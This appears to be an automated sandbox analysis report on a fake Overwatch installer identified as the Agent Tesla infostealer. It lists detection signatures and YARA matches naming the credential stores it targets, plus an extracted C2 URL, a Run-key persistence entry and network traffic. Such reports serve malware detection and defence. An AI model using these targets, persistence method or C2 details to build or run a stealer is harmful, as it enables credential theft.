Edit tour

Windows Analysis Report
Overwatch-Installer.exe

Overview

General Information

Sample name:	Overwatch-Installer.exe
Analysis ID:	1502487
MD5:	ca43bdbd4aac599edc0e76ccde512f8a
SHA1:	2f253c8f76a6dba5af7ded25a091a4cc2bbf23db
SHA256:	27e46901a6243f1d9c62e2571078b0e4818de98ce600d46bbb1ef32591f48219
Tags:	agentteslaexe
Infos:

Detection

Agent Tesla, AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Detected Agent Tesla keylogger

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected AgentTesla

Yara detected AntiVM3

.NET source code contains potential unpacker

AI detected suspicious sample

Contains functionality to capture screen (.Net source)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Installs a global keyboard hook

Machine Learning detection for dropped file

Machine Learning detection for sample

Moves itself to temp directory

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Instant Messenger accounts or passwords

Tries to steal Mail credentials (via file / registry access)

Yara detected Generic Downloader

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to detect virtual machines (STR)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Overwatch-Installer.exe (PID: 7160 cmdline: "C:\Users\user\Desktop\Overwatch-Installer.exe" MD5: CA43BDBD4AAC599EDC0E76CCDE512F8A)

dw20.exe (PID: 10268 cmdline: dw20.exe -x -s 9900 MD5: 89106D4D0BA99F770EAFE946EA81BB65)

nefgd.exe (PID: 5952 cmdline: "C:\Users\user\AppData\Roaming\nefgd\nefgd.exe" MD5: CA43BDBD4AAC599EDC0E76CCDE512F8A)

nefgd.exe (PID: 5856 cmdline: "C:\Users\user\AppData\Roaming\nefgd\nefgd.exe" MD5: CA43BDBD4AAC599EDC0E76CCDE512F8A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "Web Panel", "C2 url": "https://plantain-elk-b8pt.squarespace.com/api/comment/LikeComment"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
Overwatch-Installer.exe	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Overwatch-Installer.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
Overwatch-Installer.exe	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Overwatch-Installer.exe	AgentTesla_1	AgentTesla Payload	kevoreilly	0x2585a:$string1: smtp 0x26f9a:$string1: smtp 0x24e4a:$string2: appdata 0x24f3a:$string3: 76487-337-8429955-22614 0x24e86:$string4: yyyy-MM-dd HH:mm:ss 0x24e2c:$string6: webpanel 0x25a03:$string7: <br>UserName      : 0x25fb7:$string8: <br>IP Address  :
Overwatch-Installer.exe	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x29a44:$f1: FileZilla\recentservers.xml 0x29b50:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions 0x28f08:$b1: Chrome\User Data\ 0x18160:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x1843c:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x28f80:$b4: Opera Software\Opera Stable\Login Data 0x28fe8:$b5: YandexBrowser\User Data\ 0x1bc0c:$s4: logins.json 0x2905c:$s4: logins.json 0x2a5e2:$s5: Account.CFN 0x2ad1a:$s6: wand.dat 0x28ebc:$a1: username_value 0x28eda:$a2: password_value 0x1bc60:$a3: encryptedUsername 0x290b0:$a3: encryptedUsername 0x2972a:$a3: encryptedUsername 0x1bc3c:$a4: encryptedPassword 0x2908c:$a4: encryptedPassword 0x2974e:$a4: encryptedPassword
Overwatch-Installer.exe	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x22cb0:$s1: get_kbHook 0x23fe2:$s2: GetPrivateProfileString 0x21ee7:$s3: get_OSFullName 0x22f65:$s4: get_PasswordHash 0x226cf:$s6: FtpWebRequest 0x1bc0c:$s7: logins 0x28f72:$s7: logins 0x2905c:$s7: logins 0x2950a:$s7: logins 0x2970a:$s7: logins 0x2c788:$s7: logins 0x25f39:$s8: keylog
Overwatch-Installer.exe	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x1bc0c:$s10: logins 0x28f72:$s10: logins 0x2905c:$s10: logins 0x2950a:$s10: logins 0x2970a:$s10: logins 0x2c788:$s10: logins 0x22c81:$g1: get_Clipboard 0x22e2b:$g2: get_Keyboard 0x17574:$g3: get_Password 0x1aff2:$g3: get_Password 0x22f76:$g3: get_Password 0x22e50:$g4: get_CtrlKeyDown 0x22e72:$g5: get_ShiftKeyDown 0x22e41:$g6: get_AltKeyDown
Click to see the 2 entries

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	AgentTesla_1	AgentTesla Payload	kevoreilly	0x2585a:$string1: smtp 0x26f9a:$string1: smtp 0x24e4a:$string2: appdata 0x24f3a:$string3: 76487-337-8429955-22614 0x24e86:$string4: yyyy-MM-dd HH:mm:ss 0x24e2c:$string6: webpanel 0x25a03:$string7: <br>UserName      : 0x25fb7:$string8: <br>IP Address  :
C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x29a44:$f1: FileZilla\recentservers.xml 0x29b50:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions 0x28f08:$b1: Chrome\User Data\ 0x18160:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x1843c:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x28f80:$b4: Opera Software\Opera Stable\Login Data 0x28fe8:$b5: YandexBrowser\User Data\ 0x1bc0c:$s4: logins.json 0x2905c:$s4: logins.json 0x2a5e2:$s5: Account.CFN 0x2ad1a:$s6: wand.dat 0x28ebc:$a1: username_value 0x28eda:$a2: password_value 0x1bc60:$a3: encryptedUsername 0x290b0:$a3: encryptedUsername 0x2972a:$a3: encryptedUsername 0x1bc3c:$a4: encryptedPassword 0x2908c:$a4: encryptedPassword 0x2974e:$a4: encryptedPassword
C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x22cb0:$s1: get_kbHook 0x23fe2:$s2: GetPrivateProfileString 0x21ee7:$s3: get_OSFullName 0x22f65:$s4: get_PasswordHash 0x226cf:$s6: FtpWebRequest 0x1bc0c:$s7: logins 0x28f72:$s7: logins 0x2905c:$s7: logins 0x2950a:$s7: logins 0x2970a:$s7: logins 0x2c788:$s7: logins 0x25f39:$s8: keylog
C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x1bc0c:$s10: logins 0x28f72:$s10: logins 0x2905c:$s10: logins 0x2950a:$s10: logins 0x2970a:$s10: logins 0x2c788:$s10: logins 0x22c81:$g1: get_Clipboard 0x22e2b:$g2: get_Keyboard 0x17574:$g3: get_Password 0x1aff2:$g3: get_Password 0x22f76:$g3: get_Password 0x22e50:$g4: get_CtrlKeyDown 0x22e72:$g5: get_ShiftKeyDown 0x22e41:$g6: get_AltKeyDown
Click to see the 2 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000000.2009514442.0000000000A92000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000000.2009514442.0000000000A92000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000003.00000002.4464189616.0000000003631000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Overwatch-Installer.exe PID: 7160	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Overwatch-Installer.exe PID: 7160	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Overwatch-Installer.exe PID: 7160	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: Overwatch-Installer.exe PID: 7160	JoeSecurity_Agenttesla_Smtp_Variant	Yara detected AgentTesla	Joe Security
Process Memory Space: Overwatch-Installer.exe PID: 7160	agenttesla_smtp_variant	unknown	j from thl <j@techhelplist.com> with thx to @fumik0_ !!1!	0x19b55:$a: type={ 0x1a20f:$a: type={ 0x2d968a:$a: type={ 0x2eacd3:$a: type={ 0x19b5f:$b: hwid={ 0x2d9694:$b: hwid={ 0x2eacdd:$b: hwid={ 0x19b69:$c: time={ 0x2d969e:$c: time={ 0x2eace7:$c: time={ 0x19b73:$d: pcname={ 0x2d96a8:$d: pcname={ 0x2eacf1:$d: pcname={ 0x19b7f:$e: logdata={ 0x2d96b4:$e: logdata={ 0x2eacfd:$e: logdata={ 0x19b8c:$f: screen={ 0x2d96c1:$f: screen={ 0x2ead0a:$f: screen={ 0x19b98:$g: ipadd={ 0x2d96cd:$g: ipadd={
Process Memory Space: nefgd.exe PID: 5952	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: nefgd.exe PID: 5952	JoeSecurity_Agenttesla_Smtp_Variant	Yara detected AgentTesla	Joe Security
Process Memory Space: nefgd.exe PID: 5952	agenttesla_smtp_variant	unknown	j from thl <j@techhelplist.com> with thx to @fumik0_ !!1!	0x4545:$a: type={ 0x818f:$a: type={ 0x18439d:$a: type={ 0x1876d1:$a: type={ 0x1979ea:$a: type={ 0x3668ab:$a: type={ 0x370dab:$a: type={ 0x3865e3:$a: type={ 0x399c50:$a: type={ 0x3a4ef1:$a: type={ 0x62c5cb:$a: type={ 0x72a4b9:$a: type={ 0x7b4cda:$a: type={ 0x7fb73c:$a: type={ 0x8b5ca6:$a: type={ 0x8ba038:$a: type={ 0xc3d378:$a: type={ 0xc41849:$a: type={ 0x454f:$b: hwid={ 0x8199:$b: hwid={ 0x1843a7:$b: hwid={
Click to see the 7 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.Overwatch-Installer.exe.aaaf90.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.0.Overwatch-Installer.exe.aaaf90.1.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.0.Overwatch-Installer.exe.aaaf90.1.raw.unpack	AgentTesla_1	AgentTesla Payload	kevoreilly	0xc6ca:$string1: smtp 0xde0a:$string1: smtp 0xbcba:$string2: appdata 0xbdaa:$string3: 76487-337-8429955-22614 0xbcf6:$string4: yyyy-MM-dd HH:mm:ss 0xbc9c:$string6: webpanel 0xc873:$string7: <br>UserName      : 0xce27:$string8: <br>IP Address  :
0.0.Overwatch-Installer.exe.aaaf90.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x108b4:$f1: FileZilla\recentservers.xml 0x109c0:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions 0xfd78:$b1: Chrome\User Data\ 0xfdf0:$b4: Opera Software\Opera Stable\Login Data 0xfe58:$b5: YandexBrowser\User Data\ 0x2a7c:$s4: logins.json 0xfecc:$s4: logins.json 0x11452:$s5: Account.CFN 0x11b8a:$s6: wand.dat 0xfd2c:$a1: username_value 0xfd4a:$a2: password_value 0x2ad0:$a3: encryptedUsername 0xff20:$a3: encryptedUsername 0x1059a:$a3: encryptedUsername 0x2aac:$a4: encryptedPassword 0xfefc:$a4: encryptedPassword 0x105be:$a4: encryptedPassword
0.0.Overwatch-Installer.exe.aaaf90.1.raw.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x9b20:$s1: get_kbHook 0xae52:$s2: GetPrivateProfileString 0x8d57:$s3: get_OSFullName 0x9dd5:$s4: get_PasswordHash 0x953f:$s6: FtpWebRequest 0x2a7c:$s7: logins 0xfde2:$s7: logins 0xfecc:$s7: logins 0x1037a:$s7: logins 0x1057a:$s7: logins 0x135f8:$s7: logins 0xcda9:$s8: keylog
0.0.Overwatch-Installer.exe.aaaf90.1.raw.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x2a7c:$s10: logins 0xfde2:$s10: logins 0xfecc:$s10: logins 0x1037a:$s10: logins 0x1057a:$s10: logins 0x135f8:$s10: logins 0x9af1:$g1: get_Clipboard 0x9c9b:$g2: get_Keyboard 0x1e62:$g3: get_Password 0x9de6:$g3: get_Password 0x9cc0:$g4: get_CtrlKeyDown 0x9ce2:$g5: get_ShiftKeyDown 0x9cb1:$g6: get_AltKeyDown
0.0.Overwatch-Installer.exe.aa6cb8.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.0.Overwatch-Installer.exe.aa6cb8.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.0.Overwatch-Installer.exe.aa6cb8.2.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.0.Overwatch-Installer.exe.aa6cb8.2.raw.unpack	AgentTesla_1	AgentTesla Payload	kevoreilly	0x109a2:$string1: smtp 0x120e2:$string1: smtp 0xff92:$string2: appdata 0x10082:$string3: 76487-337-8429955-22614 0xffce:$string4: yyyy-MM-dd HH:mm:ss 0xff74:$string6: webpanel 0x10b4b:$string7: <br>UserName      : 0x110ff:$string8: <br>IP Address  :
0.0.Overwatch-Installer.exe.aa6cb8.2.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x14b8c:$f1: FileZilla\recentservers.xml 0x14c98:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions 0x14050:$b1: Chrome\User Data\ 0x32a8:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x3584:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x140c8:$b4: Opera Software\Opera Stable\Login Data 0x14130:$b5: YandexBrowser\User Data\ 0x6d54:$s4: logins.json 0x141a4:$s4: logins.json 0x1572a:$s5: Account.CFN 0x15e62:$s6: wand.dat 0x14004:$a1: username_value 0x14022:$a2: password_value 0x6da8:$a3: encryptedUsername 0x141f8:$a3: encryptedUsername 0x14872:$a3: encryptedUsername 0x6d84:$a4: encryptedPassword 0x141d4:$a4: encryptedPassword 0x14896:$a4: encryptedPassword
0.0.Overwatch-Installer.exe.aa6cb8.2.raw.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0xddf8:$s1: get_kbHook 0xf12a:$s2: GetPrivateProfileString 0xd02f:$s3: get_OSFullName 0xe0ad:$s4: get_PasswordHash 0xd817:$s6: FtpWebRequest 0x6d54:$s7: logins 0x140ba:$s7: logins 0x141a4:$s7: logins 0x14652:$s7: logins 0x14852:$s7: logins 0x178d0:$s7: logins 0x11081:$s8: keylog
0.0.Overwatch-Installer.exe.aa6cb8.2.raw.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x6d54:$s10: logins 0x140ba:$s10: logins 0x141a4:$s10: logins 0x14652:$s10: logins 0x14852:$s10: logins 0x178d0:$s10: logins 0xddc9:$g1: get_Clipboard 0xdf73:$g2: get_Keyboard 0x26bc:$g3: get_Password 0x613a:$g3: get_Password 0xe0be:$g3: get_Password 0xdf98:$g4: get_CtrlKeyDown 0xdfba:$g5: get_ShiftKeyDown 0xdf89:$g6: get_AltKeyDown
0.0.Overwatch-Installer.exe.a90000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.0.Overwatch-Installer.exe.a90000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.0.Overwatch-Installer.exe.a90000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.0.Overwatch-Installer.exe.a90000.0.unpack	AgentTesla_1	AgentTesla Payload	kevoreilly	0x2585a:$string1: smtp 0x26f9a:$string1: smtp 0x24e4a:$string2: appdata 0x24f3a:$string3: 76487-337-8429955-22614 0x24e86:$string4: yyyy-MM-dd HH:mm:ss 0x24e2c:$string6: webpanel 0x25a03:$string7: <br>UserName      : 0x25fb7:$string8: <br>IP Address  :
0.0.Overwatch-Installer.exe.a90000.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x29a44:$f1: FileZilla\recentservers.xml 0x29b50:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions 0x28f08:$b1: Chrome\User Data\ 0x18160:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x1843c:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x28f80:$b4: Opera Software\Opera Stable\Login Data 0x28fe8:$b5: YandexBrowser\User Data\ 0x1bc0c:$s4: logins.json 0x2905c:$s4: logins.json 0x2a5e2:$s5: Account.CFN 0x2ad1a:$s6: wand.dat 0x28ebc:$a1: username_value 0x28eda:$a2: password_value 0x1bc60:$a3: encryptedUsername 0x290b0:$a3: encryptedUsername 0x2972a:$a3: encryptedUsername 0x1bc3c:$a4: encryptedPassword 0x2908c:$a4: encryptedPassword 0x2974e:$a4: encryptedPassword
0.0.Overwatch-Installer.exe.a90000.0.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x22cb0:$s1: get_kbHook 0x23fe2:$s2: GetPrivateProfileString 0x21ee7:$s3: get_OSFullName 0x22f65:$s4: get_PasswordHash 0x226cf:$s6: FtpWebRequest 0x1bc0c:$s7: logins 0x28f72:$s7: logins 0x2905c:$s7: logins 0x2950a:$s7: logins 0x2970a:$s7: logins 0x2c788:$s7: logins 0x25f39:$s8: keylog
0.0.Overwatch-Installer.exe.a90000.0.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x1bc0c:$s10: logins 0x28f72:$s10: logins 0x2905c:$s10: logins 0x2950a:$s10: logins 0x2970a:$s10: logins 0x2c788:$s10: logins 0x22c81:$g1: get_Clipboard 0x22e2b:$g2: get_Keyboard 0x17574:$g3: get_Password 0x1aff2:$g3: get_Password 0x22f76:$g3: get_Password 0x22e50:$g4: get_CtrlKeyDown 0x22e72:$g5: get_ShiftKeyDown 0x22e41:$g6: get_AltKeyDown
Click to see the 15 entries

Sigma Signatures

System Summary

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Overwatch-Installer.exe, ProcessId: 7160, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MyOtApp

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Overwatch-Installer.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe

Avira: detection malicious, Label: TR/Spy.Agent.lkofd

Found malware configuration

Source: Overwatch-Installer.exe

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Web Panel", "C2 url": "https://plantain-elk-b8pt.squarespace.com/api/comment/LikeComment"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe

ReversingLabs: Detection: 68%

Multi AV Scanner detection for submitted file

Source: Overwatch-Installer.exe	Virustotal: Detection: 61%			Perma Link
Source: Overwatch-Installer.exe	ReversingLabs: Detection: 68%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.7% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Overwatch-Installer.exe

Joe Sandbox ML: detected

Source: Overwatch-Installer.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:49705 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:49717 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 192.168.2.5:49727 -> 198.185.159.177:443 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:49752 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:49753 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:49778 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:49780 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:49779 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:49793 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:49794 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:49795 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 192.168.2.5:49832 -> 198.185.159.177:443 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:49835 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:49836 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:49839 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:49840 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:49864 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:49865 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:49866 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:49868 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:49892 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:49895 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:49924 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:49929 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:49930 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:49931 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:49955 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:49957 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:49956 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:49969 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:49970 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:49971 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:49968 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:49982 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:49983 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:49988 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:49986 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:49990 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50011 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50010 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50037 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50035 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50036 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50038 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50045 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50063 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50064 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50065 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50090 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50092 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50091 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50094 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50093 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50097 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50096 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50120 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50122 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50121 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 192.168.2.5:50133 -> 198.185.159.177:443 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50148 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50149 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50150 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.5:50153 version: TLS 1.0
